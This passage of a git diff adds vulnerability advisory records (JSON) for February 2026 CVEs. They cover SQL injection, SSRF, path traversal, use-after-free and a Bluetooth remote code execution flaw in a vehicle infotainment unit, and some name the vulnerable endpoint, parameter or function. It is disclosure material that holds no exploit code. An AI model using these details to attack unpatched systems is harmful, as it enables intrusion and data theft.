"WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json b/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json new file mode 100644 index 0000000000000..460f9d9e686de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfv8-2g5x-rm48", + "modified": "2026-02-12T15:32:43Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-68406" + ], + "details": "A path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68406" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rg64-8mrm-6x23/GHSA-rg64-8mrm-6x23.json b/advisories/unreviewed/2026/02/GHSA-rg64-8mrm-6x23/GHSA-rg64-8mrm-6x23.json new file mode 100644 index 0000000000000..839bfc71c4322 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rg64-8mrm-6x23/GHSA-rg64-8mrm-6x23.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg64-8mrm-6x23", + "modified": "2026-02-16T15:32:47Z", + "published": "2026-02-16T15:32:47Z", + "aliases": [ + "CVE-2026-2558" + ], + "details": "A flaw has been found in GeekAI up to 4.2.4. The affected element is the function Download of the file api/handler/net_handler.go. This manipulation of the argument url causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2558" + }, + { + "type": "WEB", + "url": "https://github.com/yangjian102621/geekai/issues/256" + }, + { + "type": "WEB", + "url": "https://github.com/yangjian102621/geekai/issues/256#issue-3888814886" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346166" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346166" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.750730" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T14:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json new file mode 100644 index 0000000000000..1ce5960d7bf73 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg7x-c263-823c", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2495" + ], + "details": "The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2495" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3461315%40wpnakama&new=3461315%40wpnakama&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffa92be-9d38-40d9-954d-d890136b5aa1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json b/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json new file mode 100644 index 0000000000000..79e9f39b12d4e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rghx-3352-87pf", + "modified": "2026-02-12T15:32:42Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54170" + ], + "details": "An out-of-bounds read vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54170" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json new file mode 100644 index 0000000000000..c577f818717f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgjw-pqcr-56gf", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-14340" + ], + "details": "Cross-site scripting in REST Management Interface in Payara Server <4.1.2.191.54, <5.83.0, <6.34.0, <7.2026.1 allows an attacker to mislead the administrator to change the admin password via URL Payload.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:X/RE:M/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14340" + }, + { + "type": "WEB", + "url": "https://docs.payara.fish/enterprise/docs/Security/Security%20Fix%20List.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json new file mode 100644 index 0000000000000..889d69c0fb852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgq3-q5rc-mjc3", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1906" + ], + "details": "The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.0 via the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action due to missing capability checks and order ownership validation. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify Peppol/EDI endpoint identifiers (`peppol_endpoint_id`, `peppol_endpoint_eas`) for any customer by specifying an arbitrary `order_id` parameter on systems using Peppol invoicing. This can affect order routing on the Peppol network and may result in payment disruptions and data leakage.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1906" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L72" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L895" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1922c6-e63b-47aa-97de-1e2382fa25d3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json b/advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json new file mode 100644 index 0000000000000..b2830ac075ac2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgrq-m353-3wqj", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2025-67432" + ], + "details": "A stack overflow in the ZBarcode_Encode function of Monkeybread Software MBS DynaPDF Plugin v21.3.1.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67432" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Hyobin/818f52535929ec471d234bab67d94987" + }, + { + "type": "WEB", + "url": "https://gist.github.com/transparencybeam/818f52535929ec471d234bab67d94987" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json b/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json new file mode 100644 index 0000000000000..8f013e4c3e9fe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgxp-2hwp-jwgg", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2026-25087" + ], + "details": "Use After Free vulnerability in Apache Arrow C++.\n\nThis issue affects Apache Arrow C++ from 15.0.0 through 23.0.0. It can be triggered when reading an Arrow IPC file (but not an IPC stream) with pre-buffering enabled, if the IPC file contains data with variadic buffers (such as Binary View and String View data). Depending on the number of variadic buffers in a record batch column and on the temporal sequence of multi-threaded IO, a write to a dangling pointer could occur. The value (a `std::shared_ptr` object) that is written to the dangling pointer is not under direct control of the attacker.\n\nPre-buffering is disabled by default but can be enabled using a specific C++ API call (`RecordBatchFileReader::PreBufferMetadata`). The functionality is not exposed in language bindings (Python, Ruby, C GLib), so these bindings are not vulnerable.\n\nThe most likely consequence of this issue would be random crashes or memory corruption when reading specific kinds of IPC files. If the application allows ingesting IPC files from untrusted sources, this could plausibly be exploited for denial of service. Inducing more targeted kinds of misbehavior (such as confidential data extraction from the running process) depends on memory allocation and multi-threaded IO temporal patterns that are unlikely to be easily controlled by an attacker.\n\nAdvice for users of Arrow C++:\n\n1. check whether you enable pre-buffering on the IPC file reader (using `RecordBatchFileReader::PreBufferMetadata`)\n\n2. if so, either disable pre-buffering (which may have adverse performance consequences), or switch to Arrow 23.0.1 which is not vulnerable", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25087" + }, + { + "type": "WEB", + "url": "https://github.com/apache/arrow/pull/48925" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/mpm4ld1qony30tchfpjtk5b11tcyvmwh" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/17/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rh27-rh4c-2g53/GHSA-rh27-rh4c-2g53.json b/advisories/unreviewed/2026/02/GHSA-rh27-rh4c-2g53/GHSA-rh27-rh4c-2g53.json new file mode 100644 index 0000000000000..8caceab87529f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rh27-rh4c-2g53/GHSA-rh27-rh4c-2g53.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh27-rh4c-2g53", + "modified": "2026-02-15T12:30:25Z", + "published": "2026-02-15T12:30:25Z", + "aliases": [ + "CVE-2025-32062" + ], + "details": "The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote code execution on the Infotainment ECU with root privileges.\n\n\n\nFirst identified on Nissan Leaf ZE1 manufactured in 2020.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32062" + }, + { + "type": "WEB", + "url": "https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch" + }, + { + "type": "WEB", + "url": "https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html" + }, + { + "type": "WEB", + "url": "http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T11:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json b/advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json new file mode 100644 index 0000000000000..e8f4270dab2e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh68-c6m2-cjhj", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25348" + ], + "details": "Computrols CBAS-Web 19.0.0 contains a boolean-based blind SQL injection vulnerability in the 'id' parameter that allows authenticated attackers to manipulate database queries. Attackers can exploit the vulnerability by crafting boolean-based SQL injection payloads in the 'id' parameter of the servers endpoint to extract or infer database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25348" + }, + { + "type": "WEB", + "url": "https://www.computrols.com/building-automation-software" + }, + { + "type": "WEB", + "url": "https://www.computrols.com/capabilities-cbas-web" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47631" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/cbas-web-id-boolean-based-blind-sql-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rhhh-mwpc-m2qj/GHSA-rhhh-mwpc-m2qj.json b/advisories/unreviewed/2026/02/GHSA-rhhh-mwpc-m2qj/GHSA-rhhh-mwpc-m2qj.json new file mode 100644 index 0000000000000..90cb20bcd88ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rhhh-mwpc-m2qj/GHSA-rhhh-mwpc-m2qj.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhhh-mwpc-m2qj", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23178" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: i2c-hid: fix potential buffer overflow in i2c_hid_get_report()\n\n`i2c_hid_xfer` is used to read `recv_len + sizeof(__le16)` bytes of data\ninto `ihid->rawbuf`.\n\nThe former can come from the userspace in the hidraw driver and is only\nbounded by HID_MAX_BUFFER_SIZE(16384) by default (unless we also set\n`max_buffer_size` field of `struct hid_ll_driver` which we do not).\n\nThe latter has size determined at runtime by the maximum size of\ndifferent report types you could receive on any particular device and\ncan be a much smaller value.\n\nFix this by truncating `recv_len` to `ihid->bufsize - sizeof(__le16)`.\n\nThe impact is low since access to hidraw devices requires root.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23178" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2124279f1f8c32c1646ce98e75a1a39b23b7db76" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2497ff38c530b1af0df5130ca9f5ab22c5e92f29" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/786ec171788bdf9dda38789163f1b1fbb47f2d1e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cff3f619fd1cb40cdd89971df9001f075613d219" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f9c9ad89d845f88a1509e9d672f65d234425fde9" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json new file mode 100644 index 0000000000000..1d82bf0a60c65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj4g-w683-5gq4", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1925" + ], + "details": "The EmailKit – Email Customizer for WooCommerce & WP plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'update_template_data' function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the title of any post on the site, including posts, pages, and custom post types.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1925" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.2/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456972/emailkit/trunk?contextall=1&old=3419280&old_path=%2Femailkit%2Ftrunk#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f131ea1e-d652-4854-abea-6a307ca8118f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json b/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json new file mode 100644 index 0000000000000..8481941575656 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj79-m8w5-gpw8", + "modified": "2026-02-12T18:30:21Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2320" + ], + "details": "Inappropriate implementation in File input in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2320" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/435684924" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json new file mode 100644 index 0000000000000..a0dc26782875f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjm5-gmfm-6cp4", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2656" + ], + "details": "A flaw has been found in ChaiScript up to 6.1.0. This affects the function chaiscript::Type_Info::bare_equal of the file include/chaiscript/dispatchkit/type_info.hpp. This manipulation causes use after free. The attack requires local access. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2656" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636#issue-3828333582" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json b/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json index b3cdaec486048..2a414e77dabae 100644 --- a/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json +++ b/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json @@ -54,7 +54,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-404" + "CWE-404", + "CWE-476" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json b/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json new file mode 100644 index 0000000000000..a150f302cc657 